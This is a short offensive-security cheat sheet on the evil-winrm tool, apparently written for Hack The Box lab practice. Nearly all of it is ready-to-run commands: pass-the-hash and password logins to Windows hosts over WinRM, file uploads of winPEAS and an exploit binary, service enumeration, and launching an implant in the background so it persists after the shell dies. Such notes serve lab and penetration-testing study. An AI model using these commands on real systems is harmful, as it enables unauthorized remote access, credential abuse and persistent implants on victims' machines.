# evil-winrm * `evil-winrm` is used to take advantage of machines with port 5985 or 5986 open which is Powershell Remoting. * This will provide shell level access to the machine with the user account that you have compromised. * You can auth either with a hash or password * Supports SSL ### Usage * Connect with pass the hash attack ``` evil-winrm -i 10.10.100.15 -u administrator -H "c2597747aa5e43022a3a3049a3c3b09d" ``` * Password Authentication: ``` evil-winrm -i 10.10.100.15 -u a-whitehat -p "bNdKVkjv3RR9ht" ``` ### evil-winrm Docker * I have had issues with `evil-winrm` running properly on non kali Linux distros such as Ubuntu. * One simple work around is to pull a Kali Docker image and utilize that 
docker pull kalilinux/kali-rolling
sudo docker run --tty --interactive kalilinux/kali-rolling
evil-winrm -i 172.16.2.5 -u 'DANTE.ADMIN\jbercov' -p mypass123
* copy files from host into evil-winrm docker container ``` sudo docker cp /opt/winPEASx64.exe 3faed2add6c3:/opt docker cp /home/ubuntu/Documents/htb/cicada/exploit/cicada.htb.exe bbf6c66e54c3:/opt ``` ### evil-winrm Service enumeration * you can use a builtin from evil-winrm to enumerate services on a remote endpoint ``` services Path Privileges Service ---- ---------- ------- C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe False ADWS C:\Windows\HQbCgOtZ.exe False fGnb C:\Windows\qiFePsnh.exe False fYCF C:\Windows\FxRmIulx.exe False gbkS C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing C:\Windows\rIiHdlwq.exe False odgx --snip-- ``` ### evil-winrm file upload * use the builtin for evil-winrm to upload files from your attackbox to the remote host ``` upload /opt/winPEASx64.exe Info: Uploading /opt/winPEASx64.exe to C:\Windows\system32\spool\drivers\color\winPEASx64.exe ``` ### WinRM Implant Execution * start your implant in the background so if your evil-winrm shell dies your implant will continue to run ``` cmd.exe /c start /b C:\Windows\System32\spool\drivers\color\cicada.htb.exe ```